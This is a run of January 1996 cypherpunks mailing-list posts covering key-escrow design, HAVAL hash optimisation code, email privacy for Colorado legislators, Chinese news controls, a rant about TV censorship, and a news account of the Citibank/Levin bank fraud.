Message-ID: <199601201202.XAA20449@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello "Peter Trei" <trei@process.com>
  and <perry@piermont.com>, cypherpunks@toad.com, trei@process.com
 
P.T. writes:
> > "Peter Trei" writes:
...
> > > If they're nasty, they'll check on the receiving side as well, to
...
> > Nearly impossible. Why? Because they can only include the public key,
...
> 1 Alice generates session key K
> 2 encrypts with Bob's public key, producing Epb(K)
> 3 extracts 24 bits of K to make K'
> 4 encrypts with Eve's (spy) public key, producing Epe(K')
...

Eeek! that gives 2^24 possible plaintext/ciphertext pairs. Trivial to brute.

3 should be:
  extracts 24 bits of K and concatenates it with H(K) to make K'
  where H is a strong one-way hash. 


Hope that makes sense...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMQDZqCxV6mvvBgf5AQFrMgP/fE6wLHoJYZP6bI5Q29nuqvJNk5pR2WW9
L5URPg2Mc2HsGtjlyZYLEEpnCUAbWWgJ0cM/vHz/1VSApCLkeekZ73IhmEngijGc
HoHbl2krgVcKv3D6Rhlhoq4t5JgPbhU3hVpb2MiozxFmOBkZgzUYFC82Sk2leE5O
/P8lgTahzNE=
=mgkS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Sun, 21 Jan 1996 12:29:31 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: HAVAL (was Re: crypto benchmarks)
In-Reply-To: <199601202200.RAA09207@UNiX.asb.com>
Message-ID: <31017081.19731341@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei:

I didn't see your original post, but did see Deranged's response.  I
would be interested to see whatever you come up with.

On Sat, 20 Jan 1996 16:57:07 +0000, Deranged Mutant
<WlkngOwl@UNiX.asb.com> wrote:

> > The biggest problem I have with HAVAL now is that with 4 or 5 passes the
> > transform functions are larger than 10k even with compiler optimzation for
> > size.  Since the Pentium L1 instruction cache is only 8k, this makes HAVAL
> > with 4 or 5 passes extremely slow.  Do you have ideas how I can fit the 
> > transform functions into L1 cache?
> 
> You might do some creative optimization to use more registers than it 
> does.  I haven't looked at it in a while.  The code was so huge and 
> slow compared to optimized MD5 and SHS that I have up using it for an 
> unfinished encrypted file system.

The reference implementation is TERRIBLE for small caches.  You can
shrink it significantly, however, by simply looping 4x across code
that does the basic round operation for each of the 8 rotations --
something like:

  for( i = 4; --i; )
  { FF_1(t7, t6, ...);
    FF_1(t6, t5, ...);
    FF_1(t5, t4, ...);
    FF_1(t4, t3, ...);
    FF_1(t3, t2, ...);
    FF_1(t2, t1, ...);
    FF_1(t1, t0, ...);
    FF_1(t0, t7, ...);
  }

The basic macro for this is almost unchanged from the reference
implementation.

You can shrink it even further by, instead of coding the basic macro 8
times for each round, writing a round step that works on an array of 9
words (out of an array of 16), using 8 words as input and producing
the ninth as output.  You then have a two-level loop that invokes this
4x8 times, walking your working set 1 element in the array each time,
and every 8 passes moving the 8 current variables back where they
belong.

The first pass through the loop, you use elements 15..8 as input, and
produce element 7.  The second pass, you use elements 14..7 as input,
and produce element 6, etc.  After 8 passes, you move elements 7..0
back up to 15..8, and start the inner loop over.

Alternatively, you can begin with an array of 40 words (only 8 of
which contain data), use a single loop that invokes the basic
processing 32 times, walk your working set 1 word each time, and only
move the working set back where it belongs at the end of the full
round.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Sun, 21 Jan 1996 13:41:19 +0800
To: tcmay@got.net
Subject: Re: A Modest Proposal
Message-ID: <Pine.BSD.3.91.960121002749.5206A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Tim, 
 
  
  On 01 17 96 you say: 
 
    ...we are for people looking out for Number One, with the 
    expectation that many other people simply won't make it. 
 
 
  I'm reading Christopher Hill's The English Bible and the 
  Seventeenth-Century Revolution.  At page 270: 
 
    In 1616 John Rolfe, Secretary to the Virginia Company, 
    attributed to Sir Thomas Dale the view that the English 
    were 'a peculiar people marked and chosen by the finger 
    of God' to possess North America.  But the phrase [pecu- 
    liar people] soon ceased to be equivalent to 'the chosen 
    people' and came to be restricted to descriptions of them- 
    selves by the saints.  In 1659 Christopher Feake urged 
    'the real fifth-kingdom men' to 'become a peculiar people 
    (or, as it were, a nation in the midst of the nation) wait- 
    ing for the word of command from their leader [i.e. God] to 
    execute the vengeance against Babylon'.  Christ's cause 
    will 'be amiable in the eyes of all the nations in due time'. 
    Quakers and Bunyan also used the phrase.  It indicated 
    a group conscious of its superiority but also aware that 
    it was a minority.
 
  
  Time tests prophecy and expectation alike. 
 
  Hill's book has other pertinent things to say.  At p 248: 
 
    There are two (at least) ways of using the Bible for political 
    controversy, which are not easily separated.  First as CODE. 
    When Thomas Goodwin in 1639 asked 'How, by degrees, do these 
    Gentiles win ground upon the outward court in England?' he had 
    already told us that Gentiles mean Papists.  'The outward court' 
    continues a metaphor about the Jewish temple; but it was at 
    Charles I's court that the Papists were making headway. 
 
 
  At 249: 
 
    Secondly, the symbols of the myth can be interpreted to taste. 
    We have seen Cain pass from being all the reprobate to 'all 
    great landlords', Nimrod from a tyrannical king to all kings, 
    all persecutors; Samson from a type of Christ to a freedom 
    fighter or a terrorist.  There seemed to be no limits.  Cen- 
    sorship had to be restored.... 
 
    Some of the myths came to be put to secular uses.  John Bull 
    with his cudgel, the bully of the waves, the master slave- 
    trader, becomes the symbol of the chosen Anglo-Saxon people, 
    of their manifest destiny to bring the world to protestant 
    Christianity, to civilization, and in our century to 'demo- 
    cracy'.  But long before that the Bible had lost its function 
    as final arbiter. 
 
 
  At 176: 
 
    But it is not totally absurd to suggest that the role of the 
    [church] elders who decide and whose decisions are taken over 
    by 'the people' is performed in our [present-day] society by 
    the media.  The main difference is in the way in which spokes- 
    men of the latter find their way to such powerful positions: 
    unlike elders, they are not elected. 
 
 
  I expect those spokesmen are simply looking out for their Number 
  Ones 
 
                       --their employers. 
 
 
  Cordially, 
 
  Jim 
 
 
 
  NOTE.  The first bracketed insertion in the first quotation 
  is mine; the second is not.  I capitalized CODE in the second 
  quotation for the minority who can't see all that well. 
 
  The book was published in 1993 by Allen Lane / The Penguin Press. 
  Its ISBN: 0 713 99078 3.  Pages: xiv + 466. 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 21 Jan 1996 13:54:52 +0800
To: Scott Staedeli <scottst@ionet.net>
Subject: Re: You want to read MY e-mail?
In-Reply-To: <199601210259.UAA08926@ion1.ionet.net>
Message-ID: <Pine.BSF.3.91.960121004322.29953A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 20 Jan 1996, Scott Staedeli wrote:

>    from the Nando Times-
> 
> 
> DENVER (Jan 20, 1996 01:16 a.m. EST) -- A college student's request to look at
> the electronic mail of several high-profile state politicians got lawmakers'
> attention Friday.
> 
>  ... 
>    OK, if _I_ can't read your e-mail Mr. Legislator, why should you
> be able to read _mine_?

The Colorado state legislature has nothing to do with federal wiretapping 
laws and with federal laws relating to encryption.

Rather than the "government is inconsistent and bad" spin, why not 
"Colorado legislators and the Colorado governor agree that privacy is 
paramount in electronic communications.  In opposing a request for 
blanket access to their private electronic mail, they necessarily oppose 
federal attempts to have access to all electronic mail, once again 
showing that Washington is out of touch with the rest of the country.  

Parts of the federal government are catching on, however.  The U.S. Commerce 
Department recently agreed that federal attempts to 
eavesdrop on electronic transmissions counterproductive in that they are 
causing problems for U.S. companies which create computer programs 
designed to allow secure use of the Internet to engage in private 
discussions and secure commerce.  Estimates the dollar value of exports 
lost range up to $xxx, and continued chilling of U.S. programmers will 
give foreign programmers the chance to catch up in a field where U.S. 
expertise presently leads the world. ...."

Needs to be re-written and juiced up, but you get the idea.

Have at it, Sameer.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 21 Jan 1996 17:27:41 +0800
To: cypherpunks@toad.com
Subject: Update on Netscape and the Anonymiser site
Message-ID: <2.2.32.19960121091759.008954c0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Netscape 2.0b6a (win32 version) now reports the user name as "Mozilla".

Name is no longer fed out through the ftp...

Thanks Jeff!

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sun, 21 Jan 1996 17:41:27 +0800
To: John Lull <lull@acm.org>
Subject: Re: HAVAL (was Re: crypto benchmarks)
In-Reply-To: <31017081.19731341@smtp.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.960121011209.29362E-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 20 Jan 1996, John Lull wrote:

> I didn't see your original post, but did see Deranged's response.  I
> would be interested to see whatever you come up with.

I ended up doing it like this:

for (i=0; i<4; i++)
{
	FF_42(t7, t6, t5, t4, t3, t2, t1, t0, w[wi2[8*i+0]], mc2[8*i+0]);
	FF_42(t6, t5, t4, t3, t2, t1, t0, t7, w[wi2[8*i+1]], mc2[8*i+1]);
	FF_42(t5, t4, t3, t2, t1, t0, t7, t6, w[wi2[8*i+2]], mc2[8*i+2]);
	FF_42(t4, t3, t2, t1, t0, t7, t6, t5, w[wi2[8*i+3]], mc2[8*i+3]);
	FF_42(t3, t2, t1, t0, t7, t6, t5, t4, w[wi2[8*i+4]], mc2[8*i+4]);
	FF_42(t2, t1, t0, t7, t6, t5, t4, t3, w[wi2[8*i+5]], mc2[8*i+5]);
	FF_42(t1, t0, t7, t6, t5, t4, t3, t2, w[wi2[8*i+6]], mc2[8*i+6]);
	FF_42(t0, t7, t6, t5, t4, t3, t2, t1, w[wi2[8*i+7]], mc2[8*i+7]);
}

This allows all the transform functions to fit into L1 cache, but at a 
cost.  Besides the overhead of the for loop, each macro call now does two 
extra table lookups (in wi2 and mc2). The net result is a ~100% speedup 
over the reference implementation.

Also, FYI, the boolean functions used in the reference implementation can be 
optimized.  Thanks to Deranged Mutant for these:

/*
#define f_2(x6, x5, x4, x3, x2, x1, x0)                         \
           ((x2) & ((x1) & ~(x3) ^ (x4) & (x5) ^ (x6) ^ (x0)) ^ \
            (x4) & ((x1) ^ (x5)) ^ (x3) & (x5) ^ (x0)) 
*/

#define f_2(x6, x5, x4, x3, x2, x1, x0)                         \
	(((x4&x5)|x2) ^ (x0|x2) ^ x2&(x1&(~x3)^x6) ^ x3&x5 ^ x1&x4)

/*
#define f_4(x6, x5, x4, x3, x2, x1, x0)                                 \
           ((x4) & ((x5) & ~(x2) ^ (x3) & ~(x6) ^ (x1) ^ (x6) ^ (x0)) ^ \
            (x3) & ((x1) & (x2) ^ (x5) ^ (x6)) ^                        \
            (x2) & (x6) ^ (x0))
*/

#define f_4(x6, x5, x4, x3, x2, x1, x0)                                 \
	((((~x2&x5)^(x3|x6)^x1^x0)&x4) ^ ((x1&x2^x5^x6)&x3) ^ (x2&x6) ^ x0)


/*
#define f_5(x6, x5, x4, x3, x2, x1, x0)             \
           ((x0) & ((x1) & (x2) & (x3) ^ ~(x5)) ^   \
            (x1) & (x4) ^ (x2) & (x5) ^ (x3) & (x6))
*/

#define f_5(x6, x5, x4, x3, x2, x1, x0)             \
	((((x0&x2&x3)^x4)&x1) ^ ((x0^x2)&x5) ^ (x3&x6) ^ x0)

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 21 Jan 1996 11:10:27 +0800
To: Cypherpunks@toad.com
Subject: New China Ruling Threatens Closure Of News Agencies 01/19/96
Message-ID: <199601210114.CAA26108@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


In effect, the edict puts Xinhua, the world's unnewsiest news agency, in 
charge of agencies normally beyond the grasp of cadre communists -- even in 
Hong Kong, Macau and, Taiwan. On this basis, the next time Hong Kong 
billionaire Li Ka-shing did a deal with state authorities that relieved 
McDonald's Corp. or any other legal entity of its contractual 
rights (as happened last year), the story would have to be vetted by 
Xinhua.  

Xinhua already made information-control history when it established a 
service that both disseminates outgoing commercial data on the Internet and 
filters any incoming information.  

Although the State Council's directive gives Xinhua control over strictly 
"economic" news, the government body has licensed Xinhua to control 
everything, effectively ruling out reliable news. Stock markets and business 
plans are driven by market forces -- even in highly manipulated China. Even 
when one is tempted to think business is market driven, the whims of China's 
central controllers can skew everything -- as merchandisers in the casual 
wear clothing market found when that suddenly dried up because the bosses on 
top didn't like then Giordano clothing store chairman Jimmy Lai.  

The State Council's directive will in all likelihood force the New York 
Times, Reuters and other news organizations to reassess their operations in 
territories Xinhua is authorized to control.  

Controls go beyond editorial conventions. According to Xinhua, foreign wire 
services will not be allowed to increase subscribers in China "directly nor 
by ways of establishing joint ventures, solely funded companies or agents."  

The Xinhua report said that foreign news providers "will be punished in 
accordance with the law if their released information to Chinese users 
contains anything forbidden by Chinese laws and regulations, or slanders or 
jeopardizes the national interests of China."  

Jeopardizing the national interest of China is now taken to mean 
jeopardizing the interests of the communist party, or the roughly 5% of the 
population controlling the country from "the barrel of a gun," to borrow 
from Mao Zedong.  

Agencies only learned of the new rules Tuesday night when Xinhua, skirting 
the usual practice of circulating advisories on operational changes 
internally, simply put the story on the wire. One Hong Kong agency man told 
Newsbytes: "We always knew writing stories from China was a problem. Now you 
have to wonder if we'll be able to send stories from Hong Kong, without 
having to pass them by Xinhua for approval.  

The directive indicates stories will have to pass through Xinhua first -- 
pointing to a major evacuation of news services, and technology vendors who 
handle them.  


(Nigel Armstrong & I.T. Daily/19960117)  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: llurch@networking.stanford.edu (Rich Graves)
Date: Sun, 21 Jan 1996 16:54:51 +0800
To: cypherpunks@toad.com
Subject: Re: You want to read MY e-mail?
Message-ID: <199601210839.DAA04781@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

bdavis@thepoint.net (Brian Davis) shared with the world:
>On Sat, 20 Jan 1996, Scott Staedeli wrote:
>
>>    from the Nando Times-
>>
>> DENVER (Jan 20, 1996 01:16 a.m. EST) -- A college student's request to look
>> at the electronic mail of several high-profile state politicians got
>> lawmakers' attention Friday.
>>
>>  ...
>>    OK, if _I_ can't read your e-mail Mr. Legislator, why should you
>> be able to read _mine_?
>
>The Colorado state legislature has nothing to do with federal wiretapping
>laws and with federal laws relating to encryption.

Mostly true. But state governments and state politicians have been naughty
as well. Certain southern governors in the 50's and 60's spring immediately
to mind.

However, I think "an eye for an eye" is the wrong approach in the first
place. There's an opportunity for education here, and progress.

>Rather than the "government is inconsistent and bad" spin, why not
>"Colorado legislators and the Colorado governor agree that privacy is
>paramount in electronic communications.  In opposing a request for
>blanket access to their private electronic mail, they necessarily oppose
>federal attempts to have access to all electronic mail, once again
>showing that Washington is out of touch with the rest of the country.

This is clever, but I don't think it works. There is a legitimate public
interest here. Even if there's nothing incriminating in the email messages
themselves, the questions of how much government business is conducted
electronically, and how much non-government business (personal matters,
political fund-raising) is conducted on publicly funded computers on
government time are legitimate.

Pertsonally, I'd be reluctant to peep into every message ever sent on a
government computer -- it's too voyeuristic for my tastes. I'm especially
thinking about that poor staffer who was grilled by the Whitewater Committee
about one use of the word "bastard" in an unrelated email message to a
friend that had been deleted years before. It doesn't seem right to grep
for out-of-context soundbytes. Not that the new book "White House Email"
isn't good for hours of entertainment.

I'd like to see politicians put on official notice that all email on
publicly owned computers is public property, though it would be hard to
draw the line where politicians and political appointees end and the
innocent line employee begins. If the politicians end up using crypto on
government computers, great -- maybe they'd start to "get it." If the
politicians want to open accounts with outside ISPs on their own (or their
political party's) dime, great -- that's what a lot of other people on this
list have had to do. Of course if some politician starts using an outside
account for official business (and only then), then that account becomes
fair game for public disclosure as well. It's a matter of ethics and
accountability.

Because politicians have not yet been put on official notice that this is
the policy, though, I would not endorse making this policy retroactive and
grepping all their email for dirt, unless the public has something like
probable cause to do so. Next year, sure, it's all public record.

Politicians should be educated that privacy without strong encryption is
illusory anyway. Making a law that the public can't read their email simply
isn't going to work. It's unenforceable. Sure it'll slow down the rate of
public disclosure a bit. Still, some disgruntled ex-employee, or some
Woodward & Bernstein type, or Jim Bell :-), is bound to get through.

Scandals long to be free.

>Parts of the federal government are catching on, however.  The U.S. Commerce
>Department recently agreed that federal attempts to
>eavesdrop on electronic transmissions counterproductive in that they are
>causing problems for U.S. companies which create computer programs
>designed to allow secure use of the Internet to engage in private
>discussions and secure commerce.  Estimates the dollar value of exports
>lost range up to $xxx, and continued chilling of U.S. programmers will
>give foreign programmers the chance to catch up in a field where U.S.
>expertise presently leads the world. ...."
>
>Needs to be re-written and juiced up, but you get the idea.

Might play to the right crowd (for example, preaching to the choir here),
but sounds like a non sequitur to me. Not that clever non sequiturs aren't
useful.

By the way, I read something about something similar happening in California.
The new Republican Assembly "leadership" was trying to hold the computers of
the previous Democtatic "leadership" in escrow so that they could look for
dirt. Anyone know the outcome of that?

- -rich
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMQH7yioZzwIn1bdtAQHC/wF8DHUhQpWkNAE8bVHeB9zUbXG7ju2Y1+Bo
LHsVK6M4Qwd8Q2HMbaMe2/y5xBpryyVh
=A+29
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 21 Jan 1996 18:08:28 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: You want to read MY e-mail?
In-Reply-To: <199601210839.DAA04781@bb.hks.net>
Message-ID: <Pine.BSF.3.91.960121044925.3026D-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 21 Jan 1996, Rich Graves wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> bdavis@thepoint.net (Brian Davis) shared with the world:
> >On Sat, 20 Jan 1996, Scott Staedeli wrote:
> >
> >>    from the Nando Times-
> >>  ...
> >>    OK, if _I_ can't read your e-mail Mr. Legislator, why should you
> >> be able to read _mine_?
> >
> >The Colorado state legislature has nothing to do with federal wiretapping
> >laws and with federal laws relating to encryption.
> 
> Mostly true. But state governments and state politicians have been naughty
> as well. Certain southern governors in the 50's and 60's spring immediately
> to mind.
> 
> However, I think "an eye for an eye" is the wrong approach in the first
> place. There's an opportunity for education here, and progress.
> 
> >Rather than the "government is inconsistent and bad" spin, why not
> >"Colorado legislators and the Colorado governor agree that privacy is
> >paramount in electronic communications.  In opposing a request for
> >blanket access to their private electronic mail, they necessarily oppose
> >federal attempts to have access to all electronic mail, once again
> >showing that Washington is out of touch with the rest of the country.
> 
> This is clever, but I don't think it works. There is a legitimate public
> interest here. Even if there's nothing incriminating in the email messages
> themselves, the questions of how much government business is conducted
> electronically, and how much non-government business (personal matters,
> political fund-raising) is conducted on publicly funded computers on
> government time are legitimate.
>

I agree that there is a legitimate public interest in the records (recall 
the dispute when the White House planned to delete all emails, leaving no 
backups, during a change of Administration).  That doesn't mean that spin 
can't be placed on the news.  What if Congress decided to reduce its 
salary by 28% and exempt its members from filing tax returns -- to save 
wear and tear on IRS computers and service centers?

My point, however, is that privacy advocates can, and should, use their 
own equivalent of the Four Horsemen (tm) in making their arguments to the 
masses.  I can't recall a single statement as short and catchy as 
the pornographers, terrorists, drug dealers, and money launderers 
argument the FBI uses.  Tim's (?) "Four Horsemen" idea cleverly attempts to 
turn the argument on its head, but I fear that his implicit statment will be 
lost on those with less background on why privacy is important.   

Demagoguery frequently works, even if it can be distasteful.  And short 
catchy ideas sell.  Remember that Miami Vice was described in the 
beginning stages as "MTV Cops" and the network bought.
 
> ... 
> Because politicians have not yet been put on official notice that this is
> the policy, though, I would not endorse making this policy retroactive and
> grepping all their email for dirt, unless the public has something like
> probable cause to do so. Next year, sure, it's all public record.

Should the same policy apply to altavista?  (I recognize the difference, 
just throwing grenades!) 


> Politicians should be educated that privacy without strong encryption is
> illusory anyway. Making a law that the public can't read their email simply
> isn't going to work. It's unenforceable. Sure it'll slow down the rate of
                            ^^^^^^^^^^^^^ ???
I'm assuming the email was in a closed system, not on the net ...

> public disclosure a bit. Still, some disgruntled ex-employee, or some
> Woodward & Bernstein type, or Jim Bell :-), is bound to get through.
> 
> Scandals long to be free.
> 
> >Parts of the federal government are catching on, however.  The U.S. Commerce
> >Department recently agreed that federal attempts to
> >eavesdrop on electronic transmissions counterproductive in that they are
> >causing problems for U.S. companies which create computer programs
> >designed to allow secure use of the Internet to engage in private
> >discussions and secure commerce.  Estimates the dollar value of exports
> >lost range up to $xxx, and continued chilling of U.S. programmers will
> >give foreign programmers the chance to catch up in a field where U.S.
> >expertise presently leads the world. ...."
> >
> >Needs to be re-written and juiced up, but you get the idea.
> 
> Might play to the right crowd (for example, preaching to the choir here),
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Absolutely.  Different spins/messages for different audiences.  Just like 
the politicians.  I think the crowd may be broader than the Cypherpunks 
list, however.


> but sounds like a non sequitur to me. Not that clever non sequiturs aren't
> useful.

Indeed. 

>... 
> - -rich

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 21 Jan 1996 14:15:02 +0800
To: cypherpunks@toad.com
Subject: Censorship
Message-ID: <199601210327.TAA18777@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Censorship:

In the past, whenever a new medium came into play, the new medium was
subjected to extraordinarily restrictive censorship, while censorship was
radically relaxed, or abandoned altogether, on the old media.  Thus when the
talkies came in, censorship on books was relaxed.  When TV came in
censorship on movies was relaxed.  I conjecture that this represents the
power of vested interests, and the relative weakness of new interests.  Now
if this pattern is going to be repeated, we would expect the FTC to attempt
to utterly strangle the internet in a straightjacket, on behalf of the
television interests that have largely captured the FTC.

Note that current proposed legislation, legislation containing Exxon's
severe censorship rules, gives the FTC ownership of the internet.  They may
claim to own it.  Let us see them try.

Censorship on television is now much tighter than it used to be:  Expect a
radical relaxation when internet use starts to cut into television time.

Remember the original Star Treck:  Every episode would have a fistfight, a
gunfight, a space battle between starships with really cheap cheesy special
effects, Captain Kirk would dip his wick (off screen) in a new exotic alien
female, and he would defy orders, or Starfleet regulations, and most
regularly and spectacularly, he would violate the prime directive. In most
episodes a redcoat or two would be killed in a completely senseless and
unnecessary manner, illustrating the cold indifference of the universe, or
the casual evil of sentient beings.  Whenever they introduced a new
character with a red coat, you knew that violent death was on tonight's menu. 

Now consider the bland successor show "Star Treck the Next Generation":  In
a bow to political correctness they changed the words from "To boldly go
where no man has gone before" to "To boldly go where no one has gone
before". The "Next Generation" universe is socialist, and socialism is
boring.  Worse still, on "Next Generation" socialism actually works, and if
there is anything even more boring that actual real life socialism, it is
socialism that works because everyone cares about each other and they are
all such very nice people. 

Well it came to pass that our TV executives woke up to the fact that there
was something missing from the boring "Next Generation" universe, so they
shift their plots to less perfect places. 

In an upcoming science fiction series "Osiris" the story universe has social
collapse and reversion to barbarism, the exact opposite of the sickeningly
perfect "Next Generation" universe.  A logical continuation of the gimmick
they pulled in "Deep Space Nine" in order to get the story out from the
deadly grip of socialism.  So far so good.  But guess what? Nobody in the
"Osiris" story suffers violent death, and the bad guys reproduce asexually. 

Asexually!!  

What would Captain Kirk do?

Probably sodomy.

And now let us consider the cartoons.  Remember Yosemite Sam with his fiery
temper and his two six guns?  Pow! Blam!


Well guess what?  In today's cartoons, Yosemite Sam has no guns!

Poor Captain Kirk.  Poor Yosemite Sam.

Under these circumstances we should expect a certain amount of friction
around such newsgroups as alt.binaries.pictures.erotica.children,
alt.conspiracy, alt.sex.bestiality.barney, alt.nationalism.white, and so forth.

You will notice that political censorship goes hand in hand with censorship
of sex and violence:  Not only does Captain Whazisname of the "Next
Generation" and "Deep Space Nine" refrain from spreading his semen
indiscriminately across the galaxy and refrain from beating people up man on
man, he also obeys orders and regulations and never says anything that would
be controversial in his universe or ours.  They had to make Captain
Whazisname of "Deep Space Nine" black instead of the white Captain
Whazisname in "Next Generation" and young instead of old, because otherwise
nobody would have noticed that he was supposed to be different person,
played by a different actor.   Typical politically correct diversity:
Different colors, but only one voice.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 21 Jan 1996 12:02:07 +0800
To: froomkin@law.miami.edu>
Subject: Re: DES in real life
Message-ID: <199601210352.TAA20749@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:01 PM 1/20/96 -0500, Perry E. Metzger wrote:
>Thats RC4, and it isn't neccessarily better than RC4, especially if
>the RC4 key length is reasonable. No one really knows the strength of RC4.

The shortness and simplicity of RC4 leads me to believe that it must
be strong.   If something that simple had a flaw, the flaw would have
been found by now, whereas more complicated algorithms, such as DES,
might well avoid discovery of their flaws merely by their irregularity and
complexity, which makes analysis tedious.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Daniel A. Monjar" <dmonjar@vnet.net>
Date: Sun, 21 Jan 1996 21:59:41 +0800
To: Cypher Punks <cypherpunks@toad.com>
Subject: Hassles taking App. Crypt. to Taiwan?
Message-ID: <Pine.SUN.3.91.960121084123.1108B-100000@katie.vnet.net>
MIME-Version: 1.0
Content-Type: text/plain


I've lurked for quite a while now.  It is time to ask my first newbie
question.  I'll be going to Taiwan for three weeks in March.  Is there 
likely to be any problems at US or Taiwan customs  if I take
Applied Cryptology 2/e along for personal study?

Dan

--
Daniel A. Monjar  | "All opinions are my alone...
dmonjar@vnet.net  |  and possibly my children's."
        PGP Public Key fingerable
--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 21 Jan 1996 19:00:23 +0800
To: cypherpunks@toad.com
Subject: good background on CitiBank/Russian caper
Message-ID: <Pine.BSD.3.91.960121104303.1821D-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



The folling article was culled from the current issue of the journal of 
internet banking.

---------- Forwarded message ----------
Date: Fri, 19 Jan 1996 18:01:32 -0500

Journal Of Internet Banking And Commerce
Vol. 1, no. 1, January 19, 1996


---------------------------------------------
The Citibank Affair:  A Purely Russian Crime?
---------------------------------------------

Nahum Goldmann
ARRAY Development
Nahum.Goldmann@ARRAYdev.com>
http://www.ARRAYdev.com/

---------------------------------------------------------------------
Nahum Goldmann has been employed as a manager, scientist and lecturer 
in leading industrial high-tech firms and academia.  Mr. Goldmann has 
published several critically acclaimed books that deal with knowledge 
transfer issues.
---------------------------------------------------------------------

Novoye Russkoe Slovo (NRS), a NY-published newspaper which acclaims 
itself as the largest Russian-language daily outside of the x-USSR, 
published an engaging account of the so-called Citibank Affair in 
September 1995.  A fairly large article ("Purely Russian Crime..." 
NRS, Sept. 15, 1995, pp. 13-14) was written by Vladimir Strizhevsky 
but was actually based on the original investigative materials 
submitted by several contributors from Moscow and St. Petersburg, as
well as from NY, London, Brussels and other world financial capitals. 
 
Undoubtedly, NRS have done quite a good job in clarifying and 
illuminating the background of the Citibank Affair.  For whatever 
reasons, the English-language media have not covered the background 
of Russian participants that well.  However, an expert in 
electronic banking and commerce on Internet might find utterly 
fascinating the very minute details of this complex crime scheme that 
involved many people and spread across several continents. 
 
The story at NRS starts at the end of August, 1994 in Tel-Aviv.  A 
certain Alexei Lachmanov, a Georgian national and a holder of a false 
Greek passport to the name of Alexios Palmidis, had been arrested by 
Israeli police when he tried to withdraw nearly US$1M.  The funds in 
question were electronically transferred to five Israeli banks from 
Invest-capital, an Argentinean subsidiary of the Citibank.  The 
Israelis had been tipped by the Citibank through the FBI with the 
information that all the money transfers had been done with the 
illegal use of Invest-capital's own secret codes. 
 
The subsequent multinational investigation has shown that it was a 
leading St. Petersburg's, Russia computer expert Vladimir Levin who 
was able to conduct numerous electronic transfers from several 
Citibank's subsidiaries in Argentina and Indonesia to various 
financial institutions in San Francisco, Tel-Aviv, Amsterdam, Germany 
and Finland.  According to NRS's speculations, Mr. Levin's succeeded 
so well because, in addition to Citibank's own electronic cash-
management hub in NY, he was also able to crack down the electronic 
defense of several SWIFT's branch offices in the third-world 
countries.  SWIFT, a secretive Belgium-based electronic 
telecommunication consortia of World-leading banks, is primarily 
involved in mutual settlement payments amongst its members. 
 
On the other hand, in the interview with an NRS correspondent V. 
Kaminsky, Citibank's spokesman rejected the newspaper's version of 
SWIFT's penetration.  Instead he claimed that Citibank knew all along 
about Mr. Levin's infiltration, playing with him a sophisticated 
